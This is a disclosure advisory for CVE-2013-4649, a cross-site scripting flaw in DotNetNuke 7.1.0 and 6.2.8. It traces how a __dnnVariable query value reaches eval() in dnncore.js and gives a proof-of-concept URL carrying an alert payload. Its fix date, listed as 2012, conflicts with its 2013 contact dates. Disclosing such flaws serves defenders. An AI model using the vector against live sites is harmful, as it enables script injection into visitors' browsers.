DotNetNuke (DNN) 7.1.0 / 6.2.8 Cross Site Scripting

`Title: DotNetNuke (DNN) Cross-Site Scripting Vulnerability  
References: CVE-2013-4649  
Discovered by: Sajjad Pourali , Nasser Salim Al-Hadhrami  
  
Vendor http://dnnsoftware.com/  
Vendor advisory: http://www.dnnsoftware.com/Platform/Manage/Security-Bulletins (2013-07)  
Vendor contact: 2013-06-23  
Vendor response: 2013-06-24 (Cathal Connolly from DotNetNuke)  
Vendor fix and announcement: 2012-08-14  
  
Solution: Update To (6.2.9/7.1.1)  
  
Remote: yes  
Authentication required: no  
User interaction required: yes  
Impact: Medium  
  
Affected:  
  
- DNN 7.1.0 and earlier  
- DNN 6.2.8 and earlier  
  
Not affected:  
- DNN 7.1.1  
- DNN 6.2.9  
  
---  
  
Trace vulnerable place:  
  
http://www.vulnerable.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'} :   
  
...  
  
<input name="__dnnVariable" type="hidden" id="__dnnVariable" autocomplete="off" value="`{`__dnn_pageload`:`alert(/XSS/)`,`__scdoff`:`1`}" />  
  
...  
  
  
http://www.vulnerable.com/js/dnn.js :   
  
...  
  
Type.registerNamespace("dnn");  
  
...  
  
http://www.vulnerable.com/js/dnncore.js :   
  
...  
  
function __dnn_ClientAPIEnabled()  
{  
return typeof (dnn) != "undefined"  
}  
  
...  
  
if (__dnn_ClientAPIEnabled())  
{  
var sLoadHandlers = dnn.getVar("__dnn_pageload");  
if (sLoadHandlers != null)  
{  
eval(sLoadHandlers)  
}  
dnn.dom.attachEvent(window, "onscroll", __dnn_bodyscroll)  
}  
__dnn_m_bPageLoaded = true  
}  
  
...  
  
---  
  
PoC:  
  
http://www.vulnerable.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'}   
  
---  
  
+ Sajjad Pourali  
+ http://www.securation.com/  
+ http://www.cert.um.ac.ir/  
+ Contact: sajjad[at]securation.com  
`